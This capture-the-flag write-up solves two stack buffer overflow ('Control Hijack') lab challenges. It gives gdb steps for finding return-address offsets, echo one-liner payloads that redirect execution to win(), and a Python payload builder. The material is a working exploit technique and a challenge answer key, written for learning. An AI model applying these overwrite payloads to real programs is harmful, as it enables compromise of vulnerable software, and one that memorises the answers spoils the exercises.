# Control Hijack

## Control Hijack (easy)

As told in the debug output, the return address is stored 104 bytes from the input buffer and has to be changed to 0x40229e:

```shell
echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x9e\x22\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack-w
```
## Control Hijack (hard)

- In gdb, `info functions` and `disas main` tell us:
    - win() is at 0x00000000004013b4
    - challenge() returns at 0x000000000040167b
- Set a breakpoint with `b *challenge+242`, run, and give a short string of a's as input. `info frame` -> rbp is at 0x7fffc56bb090. Then `x/100xg $rbp-200` shows:
    - the input buffer starts at 0x7fffc56ba000, which is rbp-0x90 = rbp-144
    - the return address is stored at 0x7fffc56bb098, which is rbp+0x8 = rbp+8
- So: 152 a's followed by the desired address:

```shell
echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb4\x13\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack
```
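To double-check the frame arithmetic above before piping anything in, here is an added Python helper (not part of the original writeup) that derives the 152-byte offset from the rbp-relative positions found with `info frame`, packs the address little-endian the way the `\x..` escapes do, and verifies the resulting layout; the constant and function names are my own.

```python
import struct
import sys

# Observations from the gdb session in the writeup (hard variant):
#   input buffer starts at rbp-0x90, saved return address at rbp+0x8,
#   win() lives at 0x4013b4.
BUF_OFF_FROM_RBP = -0x90
RET_OFF_FROM_RBP = 0x8
WIN_ADDR = 0x4013B4


def ret_offset(buf_off: int, ret_off: int) -> int:
    """Distance from the start of the buffer to the saved return address."""
    return ret_off - buf_off


def build_payload(offset: int, target: int, filler: bytes = b"a") -> bytes:
    """Filler up to the saved return address, then the target as 8 little-endian bytes."""
    return filler * offset + struct.pack("<Q", target)


def check_layout(payload: bytes, offset: int, target: int) -> bool:
    """Confirm the payload is exactly offset+8 bytes and the 8-byte LE value at `offset` is `target`."""
    if len(payload) != offset + 8:
        return False
    return struct.unpack_from("<Q", payload, offset)[0] == target


if __name__ == "__main__":
    off = ret_offset(BUF_OFF_FROM_RBP, RET_OFF_FROM_RBP)  # 144 + 8 = 152
    payload = build_payload(off, WIN_ADDR)
    assert check_layout(payload, off, WIN_ADDR)
    # Emit raw bytes so the script can replace the echo -e in the pipeline.
    sys.stdout.buffer.write(payload)
```

Running the script and piping its output into the challenge binary produces the same bytes as the echo command above; the easy variant is the same call with offset 104 and target 0x40229e.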